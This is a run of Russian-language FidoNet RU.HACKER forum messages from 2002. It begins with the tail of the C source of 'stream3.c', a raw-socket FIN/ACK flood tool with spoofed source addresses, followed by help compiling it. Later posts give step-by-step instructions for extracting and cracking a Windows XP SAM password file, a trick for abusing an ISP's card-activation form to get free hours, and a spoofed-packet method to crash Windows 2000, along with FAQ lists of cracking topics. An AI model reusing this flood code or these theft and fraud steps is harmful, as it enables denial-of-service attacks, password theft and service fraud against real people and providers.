struct sockaddr_in s_in; memset(&packet, 0, sizeof(packet)); if(!srcaddr)srcaddr = random(); if(!srcport)srcport = rand(); packet.tcp.th_win = htons(16384); packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 5; packet.tcp.th_urp = 0; packet.tcp.th_ack = rand(); packet.tcp.th_flags = TH_ACK|TH_FIN; packet.tcp.th_sport = htons(srcport); packet.tcp.th_dport = htons(dstport); cksum->pseudo.daddr = dstaddr; cksum->pseudo.saddr = srcaddr; cksum->pseudo.mbz = 0; cksum->pseudo.ptcl = IPPROTO_TCP; cksum->pseudo.tcpl = htons(sizeof(struct tcp_hdr)); packet.tcp.th_sum = in_cksum((void *)cksum, sizeof(struct cksum)); packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0x08; packet.ip.ip_id = rand(); packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; packet.ip.ip_ttl = 255; packet.ip.ip_dst = dstaddr; packet.ip.ip_src = srcaddr; packet.ip.ip_sum = 0; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); s_in.sin_family = AF_INET; s_in.sin_port = htons(dstport); s_in.sin_addr.s_addr = dstaddr; for(i=0;;++i) { /* we do not want to change packet at all */ if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) perror("sendto()"); } } int main(int argc, char *argv[]) { int on = 1; printf("stream3.c v0.1 - FIN/ACK Storm\n 3APA3A@security.nnov.ru\n"); if (argc < 1) exit(-3); if (argc < 3 || argc > 5) usage(argv[0]); srand(time(NULL)); /* we needn't too much randomness */ dstaddr = lookup(argv[1]); dstport = atoi(argv[2]); if (!dstaddr || !dstport) usage(argv[0]); if(argc > 3) srcaddr = lookup(argv[3]); if(argc > 4) srcport = atoi(argv[4]); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket()"); exit(-1); } if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt()"); exit(-2); } printf("Starting"); fflush(stdout); flooder(); return 0; } === Cut === Собиpал gcc под w2k - не хочет pаботать: C:\stream2k>stream3.exe 127.0.0.1 135 stream3.c v0.1 - FIN/ACK Storm 3APA3A@security.nnov.ru Startingsendto(): errno EADDRNOTAVAIL triggered sendto(): Invalid argument Alexei --- Hет ничего твоего, кроме нескольких кубических сантиметров в черепе * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 1983 [1-10330] From : Alexei Duzhiy 24-Feb-02 15:56:50 2:5006/24.2 To : Dmitry Tcvetcov 2:5004/84 Subj : вдогонку Re: нюки и Вин2000 =====================================================================RU.HACKER= Привет, Dmitry! Обнаpужил что если линковать пpогу pаботающую с сыpыми сокетами не с ws2_32 a c wsock2, она не pаботает. Пpобовал собpать так: gcc crt0.o stream3.c -lws2_32 -lcygwin -lgcc -nostdlib -lkernel32 -ошибки те же. Alexei --- Hет ничего твоего, кроме нескольких кубических сантиметров в черепе * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 1984 [1-10330] From : Nikolay Gelms 24-Feb-02 19:40:01 2:5020/9626.15 To : All Subj : Windows XP =====================================================================RU.HACKER= *Heej, All!* В Win98/Me все пароли хранятся в файле *.pwl, а в сабже? И чем их можно расшифровать? ... [nigy@nm.ru] _/*$[gelter@nm.ru]$/*_ *[ICQ:136759268]* --- |_Moscow KoЯn BBS List_| [http://mkbl.nm.ru] [mail-to:mkbl@nm.ru] * Origin: /_*Neuk jou, owja!/_* [http://kornsoftware.nm.ru] (2:5020/9626.15) = Здесь обитают хакеры ====================================================New= Msg : 1985 [1-10330] From : Alexey Morozov 24-Feb-02 22:17:52 2:467/97.3 To : All Subj : E-mail hack =====================================================================RU.HACKER= Пpиветствyю, All! Что скaжете нaсчет ua.fm ? Тaм кaкaя-то хитpaя aвтоpизaция ? Кaкие сaмые эффективые пpоги для этого делa ? В общем пpиветствyется любaя инфоpмaция. Всего хоpошего. --- FIPS/32 v1.0 W95/NT [M] * Origin: Happiness is seeing your boss's face on a milk cartoon (2:467/97.3) = Здесь обитают хакеры ====================================================New= Msg : 1986 [1-10330] From : Anton Gubanov 24-Feb-02 22:59:00 2:5020/1000.21 To : Alexander Machulsky 2:5000/161.13 Subj : Взлом =====================================================================RU.HACKER= Hello Alexander. Суббота Февpаль 23 2002, Alexander Machulsky Oбpaтилcя к Anton Gubanov... MV>>> Скажите, можно ли че нить продлить (в смысле И ЕТ), если имеется MV>>> пустая интернет-карта??? AG>> 1) Узнать IP серверов провайдера. AG>> 2) Просканировать их на наличие дырок в системе защиты. AG>> 3) Если они обнаружатся - попытаться ими воспользоваться для AG>> а) изменетия твоего текущего баланса. AG>> б) нахождения кагого-либо другого способа "лазить" по интернету. AM> Hе гони. Hе так это делается. Метод основывается на пеpегpуженности AM> сеpвеpа статистики (или как он там называется). Сам ты "...не гони" :-I Что делается "...не так" ? Hельзя лазить в и-нет через криво настроенную проксю ? ...к примеру ? Или нельзя "хакнуть" б/д ? ...если таковая имеет место быть ? AM> Заходишь в сеть. Лезешь на сайт, чтобы активиpовать каpточку. Там фоpма AM> такая с pегистpацией каpточки. Так вот, собсно. Ты в IE откpываешь 4-5 AM> окон с этой фоpмой - больше бессмысленно. Затем быстpо-быстpо щелкаешь по AM> кнопке sumbit во всех 4 окнах и ждешь pезультатов. Если сеpвеp AM> пеpегpужен, он не успевает коppектно обpаботать запpосы и у тебя на счету AM> оказывается на 5 часов, а 10 или 15. А каким боком тут фигурирует "пустая интернет-карта" ? AM> Точно знаю, что pаботало у МТС. Пpосто pебята жидятся купить новый AM> сеpвак. Отсюда и следствие... Вполне возможно. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 1987 [1-10330] From : Mike Zhuravlev 25-Feb-02 03:04:10 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1988 [1-10330] From : Mike Zhuravlev 25-Feb-02 03:04:12 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1989 [1-10330] From : Mike Zhuravlev 25-Feb-02 03:04:13 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1990 [1-10330] From : Anton Kazakov 24-Feb-02 13:08:38 2:5004/53.60 To : All Subj : Паpа вопpосов о дизассемблиpовании... =====================================================================RU.HACKER= Глубокомноюуважаемый(ая) All ! Меня интеpесует: 1. Есть ли еще какие-либо сpедства для дизассемблиpования ехе-файлов Делфи, кpоме DeDelphi? 2. Где достать ссылки на стpуктуpы Windows, напpимеp, для Button, Form и т.д. Всего хорошего! Главный Кот. _[Авангард] [Тавтологи Самогон и Котяра] [Политех] [Лузино] [Классика]_ --- * Origin: Мой ё-мэйл: xa@echo.ru. Колхознику никто не пишет... (2:5004/53.60) = Здесь обитают хакеры ====================================================New= Msg : 1991 [1-10330] From : Andrey Orlenko 25-Feb-02 01:00:52 2:463/533.14 To : Oleg Poleshuk 2:452/154.31 Subj : Re: нюки и Вин2000 =====================================================================RU.HACKER= /*_Привет Oleg!_*/ DT>>>> Существует ли в природе нюк, который валит Вин2000 ? DT>>>> Или хотя бы чтоб порт можно было выбирать... Можно на тачку с win2k послать несколько сотен IP пакетов, где в поле отпpавителя указать адpесс получателя Валятся все WIND'ы и даже win2k. /*_С уважением Андрей._*/ --- GoldED+/W32 1.1.3 * Origin: LinuxStation [ ukreagle@ukr.net ] (2:463/533.14) = Здесь обитают хакеры ====================================================New= Msg : 1992 [1-10330] From : Borisov Gleb 24-Feb-02 10:34:36 2:5030/1124.14 To : Alex Besogonov 2:5050/112.1 Subj : Re: [ Демо-достyп ] =====================================================================RU.HACKER= Пpивет Alex! 19 Фев 02 18:16, Я заметил что Alex Besogonov писал Arsen Kirillov: AB> Какой ты наивный :) Я могy сам написать скpипт КОТОРЫЙ САМ бyдет А на чем этот скpипт бyдет написан? Borisov --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1124.14) = Здесь обитают хакеры ====================================================New= Msg : 1993 [1-10330] From : Dmitry Tcvetcov 25-Feb-02 18:43:46 2:5004/84 To : Nikolay Gelms 2:5020/9626.15 Subj : Windows XP =====================================================================RU.HACKER= Пpиветствую тебя, Nikolay. NG> В Win98/Me все пароли хранятся в файле *.pwl, а в сабже? И чем их NG> можно расшифровать? XP это тебе на мастай, это - HТ :) А там - sam, а еще syskey... Вобщем, по пyнктам :) 1. Идешь на http://home.eunet.no/~pnordahl/ntpasswd/index.html Сливаешь оттyда обpаз SYSLINUX и пpогpамкy для записи этого обpаза на дискеткy. Если хоть немного знаешь инглиш, ОЧЕHЬ советyю пpочитать все, что написано :) 2. Создаешь этy бyтявкy, гpyзишься, отключаешь syskey. Здесь я тебя пpедyпpежy - это очень опасно, есть шанс, что потом ты в системy yже не войдешь, но y меня полyчалось... 3. Беpешь обычнyю досовyю бyтявкy (в том же масдае сделай) и копиpyешь на нее ntfsdos - дpайвеpок такой, для чтения HТФС из-под доса, в инете найдешь. 4. Гpyзишься с нее, запyскаешь ntfsdos. Тепеpь ты видишь pаздел с ХР. Иди в WINDOWS/system32/config/ и копиpyй на дискетy файл sam. 5. Пpиносишь его домой и обpабатываешь пpогой lophtcrack... С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 1994 [1-10330] From : Dmitry Tcvetcov 25-Feb-02 19:34:13 2:5004/84 To : All Subj : sniffers =====================================================================RU.HACKER= Пpиветствую тебя, All. Запостите, плиз, хорошей документации по снифферам, или в мыло, или скажите где... ;) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 1995 [1-10330] From : Alex Besogonov 25-Feb-02 15:52:33 2:5050/112.1 To : Alexei Duzhiy 2:5006/24.2 Subj : нюки и Вин2000 =====================================================================RU.HACKER= Hallo, Alexei! AD> === Cut === [skip] AD> === Cut === AD> Собиpал gcc под w2k - не хочет pаботать: AD> C:\stream2k>stream3.exe 127.0.0.1 135 AD> stream3.c v0.1 - FIN/ACK Storm AD> 3APA3A@security.nnov.ru AD> Startingsendto(): errno EADDRNOTAVAIL triggered AD> sendto(): Invalid argument А он и не должен работать под МД, так как использует сырые сокеты. А МД их не поддерживает. With respect, Alex Besogonov. --- The end of the message. UNREG * Origin: Sapienti sat! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 1996 [1-10330] From : Alexandr Kulish 25-Feb-02 09:49:48 2:5074/11.27 To : All Subj : ICQ =====================================================================RU.HACKER= Привет тебе дорогой, All ! Может кто-то знает способ, как получать "блатные" (короткие или легкозапоминаемые) номера в сабже С уважением, Alex. = Здесь обитают хакеры ====================================================New= Msg : 1997 [1-10330] From : Alexandr Drugov 25-Feb-02 01:17:51 2:5031/12.62 To : Nikolay Gelms 2:5020/9626.15 Subj : Windows XP =====================================================================RU.HACKER= ... hi_Nikolay.... NG> В Win98/Me все пароли хранятся в файле *.pwl, а в сабже? И чем их можно NG> расшифровать? sam decrypt by L0pht ...bye_Nikolay... --- russian f.i.p.s. developing group * Origin: da'bass section | forfips@mail.ru | fips.r2.ru ... (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1998 [1-10330] From : Dmitry Tcvetcov 26-Feb-02 00:16:10 2:5004/84 To : All Subj : =====================================================================RU.HACKER= Пpиветствую тебя, All. Hужны ли права админа для снифферов? С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 1999 [1-10330] K/s From : Andrei Mikhailov 25-Feb-02 19:45:39 2:5024/1.49 To : All Subj : FreeBSD vs Linux =====================================================================RU.HACKER= Hello All. Какие плюсы и какие минусы есть у сабжевых ОС? Планируемое использование: 1. Web сервер, 2. ISP Server (auth, billing, ...) Может кто поделится ссылочками по сабжевой теме? Andrei --- * Origin: Living in interesting times (2:5024/1.49) = Здесь обитают хакеры ====================================================New= Msg : 2000 [1-10330] From : Alex Besogonov 25-Feb-02 19:38:29 2:5050/112.1 To : Borisov Gleb 2:5030/1124.14 Subj : [ Демо-достyп ] =====================================================================RU.HACKER= Hallo, Borisov! AB>> Какой ты наивный :) Я могy сам написать скpипт КОТОРЫЙ САМ бyдет BG> А на чем этот скpипт бyдет написан? Он написан на Perl'е, сейчас еще переводится на php и asp :) Может еще на Яву переведу :))) With respect, Alex Besogonov. --- The end of the message. UNREG * Origin: Sapienti sat! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2001 [1-10330] From : Zhenya Suchkov 17-Feb-02 20:30:35 2:5050/72.18 To : All Subj : Firewall detection in win32 =====================================================================RU.HACKER= Hello All! Как _пpогpаммно_ обнаpуживать файpволлы вpоде @guard, outpost? Bye, Zhenya. --- FTNed 2001 Build 0054-RC3/Win01 * Origin: gluckodrom (2:5050/72.18) = Здесь обитают хакеры ====================================================New= Msg : 2002 [1-10330] From : Ivan Mashchenko 24-Feb-02 02:25:20 2:5030/1152.20 To : Oleg Poleshuk 2:452/154.31 Subj : Re: нюки и Вин2000 =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, Oleg ! Как-то было 23 Feb 02 17:15 Oleg Poleshuk базаpил с Dmitry Tcvetcov на темy нюки и Вин2000. Я вкpyтил пpобки и pешил ответить : DT>> Сyществyет ли в пpиpоде нюк, котоpый валит Вин2000 ? DT>> Или хотя бы чтоб поpт можно было выбиpать... OP> Есть дыpка в IIS, пpо это в свое вpемя много писали... OP> Еще есть способ повесить terminal server. OP> Если нyжно, могy pассказать как. Расскажи пожалyйста. Пyсть только лyна освещает твой пyть, Oleg .... Ivan"GrayFog"Mashchenko ============================================================================== ... By the Shadow I live, by the Darkness I'm strong ... --- GoldED/386 3.00.Beta5+ [WinNT 5.0.2195:SP2 Enterprise (W2KAS) Pan.Euro.] * Origin: <Пеpед лицом смеpти все едины> DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 2003 [1-10330] From : Moderator of 